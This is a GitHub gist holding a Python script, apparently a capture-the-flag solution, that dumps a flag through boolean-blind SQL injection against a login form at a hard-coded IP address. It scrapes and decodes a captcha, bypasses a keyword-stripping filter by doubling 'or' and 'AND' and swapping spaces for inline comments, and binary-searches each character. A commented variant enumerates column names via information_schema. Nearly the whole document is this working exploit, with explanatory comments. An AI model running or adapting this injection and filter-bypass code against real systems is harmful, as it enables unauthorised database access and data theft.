@omakmoh
Created August 8, 2022 12:27
SQL Dumper for Kenzy from ASCWG 2022
import requests,re,base64
# One client session shared by every request, so cookies returned by the
# captcha GET are sent back with the login POST in sqli().
s = requests.Session()

# Captures the first value that sits between `:"` and the next `"` in the
# captcha response (lookbehind / lazy match / lookahead). The response is
# presumably JSON, but it is scraped with this regex rather than parsed.
pat = r'(?<=\:").+?(?=\")'

# Offset used only by the commented-out column-enumeration probe in sqli().
lipos = 0
def sqli(pos: int, mid: int) -> bool:
    """Send one boolean-blind probe asking whether ``mid < ascii(flag[pos])``.

    The function fetches a fresh captcha from ``captcha.php``, scrapes and
    double-base64-decodes it, posts the probe string as the ``username``
    form field together with that captcha, and reports whether the
    success marker text appears in the response body.

    Args:
        pos: 1-based character position handed to SQL ``substr``.
        mid: candidate ASCII code compared with ``<`` against that character.

    Returns:
        True when the response contains "Treasures are always"; the caller
        (``get_char``) interprets this as "mid is below the character's code".

    Raises:
        IndexError: when ``pat`` matches nothing in the captcha response
            (``notlatestcap[0]`` is indexed without a length check).
        binascii.Error: when either base64 layer is malformed.
        UnicodeDecodeError: when a decoded layer is not valid UTF-8.
        Any ``requests`` exception from the two HTTP calls propagates unchanged.
    """
    cap = s.get('http://34.175.249.72:60001/scripts/captcha.php')
    response = cap.text
    # First `:"…"` value in the body; assumed to be the captcha field -- confirm.
    notlatestcap = re.findall(pat, response)
    # The captured value is base64 wrapped in base64: decode, re-decode.
    verylatestcap = base64.b64decode(notlatestcap[0]).decode("utf-8")
    veryverylatestcap = base64.b64decode(verylatestcap)
    code = veryverylatestcap.decode("utf-8")
    # Three literal, order-sensitive rewrites over the whole SQL text:
    # 'or' -> 'oorr', 'AND' -> 'ANANDD', then every space -> '/**/'. They
    # are global replaces, so any future edit that adds a token containing
    # 'or' or 'AND' anywhere in the query is rewritten as well.
    # NOTE(review): the form presumably relies on a keyword-stripping filter;
    # the effective mitigation on the server side is a parameterised query,
    # not a longer deny-list.
    payload = f"admin' AND {mid}<ascii(substr((select flag from solve),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
    # Alternative probe kept by the author for enumerating column names of
    # `users`; it is the only consumer of the module-level `lipos`.
    # payload = f"admin' AND {mid}<ascii(substr((select concat(column_name) from information_schema.columns where table_schema=database() AND table_name='users' limit {lipos},1),{pos},1))#".replace('or','oorr').replace('AND','ANANDD').replace(' ','/**/')
    #print(payload)
    # The SQL text is reused as the form's username; the other fields are fixed.
    payload = {"username":payload,"password":"asd","captcha":code,"send":"Send"}
    #print(payload)
    r = s.post('http://34.175.249.72:60001/index.php', data=payload)
    #print(r.text)
    # Substring test on the HTML body is the whole oracle.
    return "Treasures are always" in r.text
def get_char(pos):
    """Recover the character at 1-based ``pos`` by binary search over codes 32..128.

    Every probe asks the oracle ``sqli(pos, probe)`` whether ``probe`` lies
    below the character's ASCII code; the window shrinks until ``low`` rests
    on the code itself, which is then returned as a one-character string.
    """
    low, high = 32, 128
    while low <= high:
        probe = (low + high) // 2
        if not sqli(pos, probe):
            # probe >= code: the answer is at or below this probe
            high = probe - 1
        else:
            # probe < code: the answer is strictly above this probe
            low = probe + 1
    return chr(low)
# Recover thirty characters, one position after another (length 30 is
# hard-coded and presumably the expected flag length), then print the result.
flag = ''.join(get_char(i) for i in range(1, 31))
print(flag)
@zAbuQasem
Great code!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment